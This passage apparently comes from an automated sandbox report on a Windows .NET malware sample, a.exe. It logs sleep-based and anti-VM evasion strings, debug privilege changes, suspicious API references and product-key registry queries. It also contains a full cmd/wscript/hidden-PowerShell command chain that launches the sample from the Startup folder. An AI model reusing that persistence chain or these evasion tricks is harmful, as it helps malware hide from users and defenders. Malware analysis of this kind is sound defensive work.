Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep count: 1905 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep count: 833 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 4928	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 584	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799657s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10799141s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798438s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10798079s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10797204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796313s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10796110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795813s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10795063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10794063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10793954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97469s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -97015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -96094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -95375s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10789125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10789016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788641s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500	Thread sleep time: -10788250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5676	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5464	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp	Binary or memory string: e:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: a.exe, 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	Binary or memory string: EnableAntiVMware
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\ProgramData\a.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\ProgramData\a.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process token adjusted: Debug

Source: C:\ProgramData\a.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 13.2.a.exe.400000.0.unpack, CC2/LCs.cs	Reference to suspicious API methods: ('WXK', 'VirtualProtect@kernel32'), ('LXr', 'GetProcAddress@kernel32'), ('lXy', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Reference to suspicious API methods: ('EBg', 'GetProcAddress@kernel32'), ('UBW', 'LoadLibrary@kernel32')
Source: 13.2.a.exe.400000.0.unpack, DCX/jCC.cs	Reference to suspicious API methods: ('FCK', 'MapVirtualKey@user32.dll')

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\ProgramData\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'			Jump to behavior

Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: a.exe, 0000000D.00000002.952262097.0000000001730000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\ProgramData\a.exe	Queries volume information: C:\ProgramData\a.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
